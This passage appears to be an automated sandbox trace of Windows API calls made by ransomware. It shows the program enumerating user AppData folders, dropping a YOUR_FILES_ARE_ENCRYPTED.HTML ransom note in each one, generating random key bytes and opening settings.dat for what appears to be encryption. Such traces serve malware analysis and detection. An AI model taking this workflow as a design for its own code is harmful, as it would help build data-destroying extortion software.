lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc51817, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc51817, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc51817, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d6e6, dwReserved1=0x315d638, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0118.167] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc51817, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc51817, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc51817, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d6e6, dwReserved1=0x315d638, cFileName="..", cAlternateFileName="")) returned 1 [0118.167] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc51817, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc51817, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc51817, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d6e6, dwReserved1=0x315d638, cFileName="..", cAlternateFileName="")) returned 0 [0118.167] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0118.167] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0118.167] GetProcessHeap () returned 0x600000 [0118.167] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.167] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.vclibs.140.00_8wekyb3d8bbwe\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.168] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.170] CloseHandle (hObject=0x324) returned 1 [0118.170] GetProcessHeap () returned 0x600000 [0118.170] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.170] GetProcessHeap () returned 0x600000 [0118.170] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0118.170] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc51817, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc51817, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc51817, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0118.170] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.170] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\LocalState") returned 97 [0118.170] GetProcessHeap () returned 0x600000 [0118.170] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0118.170] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\LocalState" [0118.170] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\LocalState\\*" [0118.170] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc51817, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc51817, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc51817, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d6e6, dwReserved1=0x315d638, cFileName=".", cAlternateFileName="")) returned 0x626638 [0118.171] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc51817, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc51817, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc51817, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d6e6, dwReserved1=0x315d638, cFileName="..", cAlternateFileName="")) returned 1 [0118.171] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc51817, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc51817, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc51817, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d6e6, dwReserved1=0x315d638, cFileName="..", cAlternateFileName="")) returned 0 [0118.171] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0118.171] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0118.171] GetProcessHeap () returned 0x600000 [0118.171] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.171] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.vclibs.140.00_8wekyb3d8bbwe\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.172] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.173] CloseHandle (hObject=0x324) returned 1 [0118.173] GetProcessHeap () returned 0x600000 [0118.173] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.173] GetProcessHeap () returned 0x600000 [0118.173] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0118.173] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc51817, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc51817, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc51817, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0118.173] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.173] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\RoamingState") returned 99 [0118.173] GetProcessHeap () returned 0x600000 [0118.173] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0118.173] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\RoamingState" [0118.173] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\RoamingState\\*" [0118.173] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc51817, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc51817, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc51817, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d6e6, dwReserved1=0x315d638, cFileName=".", cAlternateFileName="")) returned 0x626638 [0118.174] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc51817, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc51817, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc51817, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d6e6, dwReserved1=0x315d638, cFileName="..", cAlternateFileName="")) returned 1 [0118.174] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc51817, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc51817, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc51817, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d6e6, dwReserved1=0x315d638, cFileName="..", cAlternateFileName="")) returned 0 [0118.174] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0118.174] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0118.174] GetProcessHeap () returned 0x600000 [0118.174] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.174] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.vclibs.140.00_8wekyb3d8bbwe\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.175] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.176] CloseHandle (hObject=0x324) returned 1 [0118.176] GetProcessHeap () returned 0x600000 [0118.176] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.176] GetProcessHeap () returned 0x600000 [0118.176] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0118.176] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc51817, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc77a0e, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc77a0e, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0118.176] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.176] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\Settings") returned 95 [0118.176] GetProcessHeap () returned 0x600000 [0118.176] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0118.176] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\Settings" [0118.176] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\Settings\\*" [0118.176] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc51817, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc77a0e, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbd82a85, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d6e6, dwReserved1=0x315d638, cFileName=".", cAlternateFileName="")) returned 0x626638 [0118.177] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc51817, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc77a0e, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbd82a85, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d6e6, dwReserved1=0x315d638, cFileName="..", cAlternateFileName="")) returned 1 [0118.177] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbc77a0e, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc77a0e, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc77a0e, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d6e6, dwReserved1=0x315d638, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0118.177] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.177] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\Settings\\roaming.lock") returned 108 [0118.177] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0118.177] lstrlenW (lpString=".lock") returned 5 [0118.177] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0118.177] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbc77a0e, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbe8daed, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x315d6e6, dwReserved1=0x315d638, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0118.177] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.178] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\Settings\\settings.dat") returned 108 [0118.178] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0118.178] lstrlenW (lpString=".dat") returned 4 [0118.178] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0118.178] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0118.178] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.vclibs.140.00_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0118.178] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0118.178] GetProcessHeap () returned 0x600000 [0118.178] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0118.182] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="3A") returned 2 [0118.182] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="B5") returned 2 [0118.182] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="20") returned 2 [0118.182] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="1E") returned 2 [0118.182] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="86") returned 2 [0118.182] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="31") returned 2 [0118.182] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="30") returned 2 [0118.182] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="68") returned 2 [0118.182] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="E3") returned 2 [0118.182] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="B2") returned 2 [0118.182] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="7F") returned 2 [0118.182] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="D8") returned 2 [0118.182] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="55") returned 2 [0118.182] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="42") returned 2 [0118.182] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="91") returned 2 [0118.182] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="C3") returned 2 [0118.182] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="C3") returned 2 [0118.182] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="07") returned 2 [0118.182] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="53") returned 2 [0118.182] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="EC") returned 2 [0118.182] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="7A") returned 2 [0118.182] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="0C") returned 2 [0118.182] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="D8") returned 2 [0118.182] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="3C") returned 2 [0118.182] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="CB") returned 2 [0118.182] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="D6") returned 2 [0118.182] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="E4") returned 2 [0118.182] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="F2") returned 2 [0118.182] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="35") returned 2 [0118.182] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="5A") returned 2 [0118.183] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="43") returned 2 [0118.183] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="1A") returned 2 [0118.183] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\Settings\\settings.dat" [0118.183] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0118.183] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0118.183] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xdbd82a85, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbd82a85, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbd82a85, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x315d6e6, dwReserved1=0x315d638, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0118.183] StrStrIW (lpFirst="settings.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.183] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1") returned 113 [0118.183] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0118.183] lstrlenW (lpString=".LOG1") returned 5 [0118.183] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0118.183] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xdbd82a85, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbd82a85, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbd82a85, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d6e6, dwReserved1=0x315d638, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0118.183] StrStrIW (lpFirst="settings.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.183] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2") returned 113 [0118.183] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0118.183] lstrlenW (lpString=".LOG2") returned 5 [0118.183] 